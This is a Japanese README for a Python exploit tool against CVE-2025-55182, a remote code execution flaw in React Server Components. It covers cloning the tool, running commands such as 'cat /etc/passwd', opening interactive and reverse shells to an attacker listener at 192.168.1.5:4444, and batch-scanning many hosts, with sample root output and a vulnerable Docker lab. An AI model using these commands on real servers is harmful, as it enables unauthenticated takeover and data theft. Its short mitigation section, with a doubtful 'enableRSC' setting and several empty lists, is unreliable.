CVE-2025-55182(React Server Components RCE)用のPythonベースのエクスプロイト。インタラクティブシェル、リバースシェル、バッチスキャン、および認可されたセキュリティテスト用のDockerベースの脆弱環境を備えています。
⚠️ 法律声明: このツールは、セキュリティ研究、許可された侵入テスト、および教育目的のみを対象としています。明示的な許可なしにこのツールを対象システムに使用することは違法であり非倫理的です。
CVE-2025-55182 は、React Server Components (RSC) における重要なリモートコード実行 (RCE) 脆弱性であり、認証を受けていない攻撃者が悪意のある JavaScript のデシリアライゼーションを通じてサーバー上で任意のコードを実行することを可能にします。
| 属性 | 値 |
|---|
| CVE ID | CVE-2025-55182 |
| CVSS スコア | 9.8 (クリティカル) |
| 攻撃ベクトル | ネットワーク |
| 攻撃の複雑さ | 低 |
| 必要な権限 | なし |
| ユーザーインタラクション | なし |
| 影響 | 高 (機密性、完全性、可用性) |
| 影響を受けるコンポーネント | React Server Components (RSC) |
| 影響を受けるバージョン | React 18.x - 19.x (特定のビルド) |
| 公開日 | 2025年12月3日 |
| CVE エイリアス | React2Shell |
根本原因: React Server Components は、RSC ペイロードを処理する際にユーザー提供の JavaScript オブジェクトを不適切にデシリアライズし、攻撃者がサーバー上で実行される悪意のあるコードを注入することを可能にします。
攻撃ベクトル: HTTP リクエスト内の悪意のある RSC ペイロード 影響: 認証なしのリモートコード実行、サーバー乗っ取り、データ漏洩
# リポジトリをクローン
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# 依存関係をインストール
pip install -r requirements.txt
# 依存関係をインストール
pip install requests
# 脆弱なターゲット上でコマンドを実行
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# インタラクティブシェルモード
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# カスタムコマンド
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# カスタム IP/ポートを使用したリバースシェル
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# バッチスキャン
python exploit/batch_scanner.py -f targets.txt
# 詳細モード
python exploit/cve_2025_55182.py -u http://target.com -v
# カスタム User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
脆弱なアプリケーションにアクセス: http://localhost:3000
脆弱なサーバー上で単一のコマンドを実行:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
期待される出力:
[+] 脆弱性検出成功: React Server Components RCE
[+] 実行コマンド: id
[+] 応答:
uid=0(root) gid=0(root) groups=0(root)
脆弱なサーバー上でインタラクティブシェルを取得:
python exploit/cve_2025_55182.py -u http://target.com --shell
機能:
リバースシェル接続を確立:
# 攻撃マシン上で
nc -lvnp 4444
# エクスプロイトツールを実行
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
複数のターゲットをスキャン:
# ターゲットファイルを作成
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# バッチスキャナーを実行
python exploit/batch_scanner.py -f targets.txt
React のアップグレード
npm install react@latest
# 修正バージョンにアップグレード
RSC リクエストのブロック
// 一時的に RSC を無効化
const config = {
enableRSC: false
}
WAF ルール
# 脆弱な環境をセットアップ
cd target && docker-compose up -d
# 脆弱性をテスト
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# テストスイートを実行
python tests/test_exploit.py
このツールは以下を示します:
このプロジェクトは MIT ライセンスの下で提供されています - 詳細は LICENSE ファイルを参照してください。
重要: このツールは教育および許可されたセキュリティテスト目的専用です。
このツールを使用することにより、以下に同意するものとします:
本番システムでこの脆弱性を発見した場合:
ベンダーへの報告
CVE 割り当て
セキュリティコミュニティ
覚えておいてください: セキュリティ研究は常に倫理的かつ合法的であるべきです。あなたのスキルを使ってインターネットをより安全にしましょう! 🛡️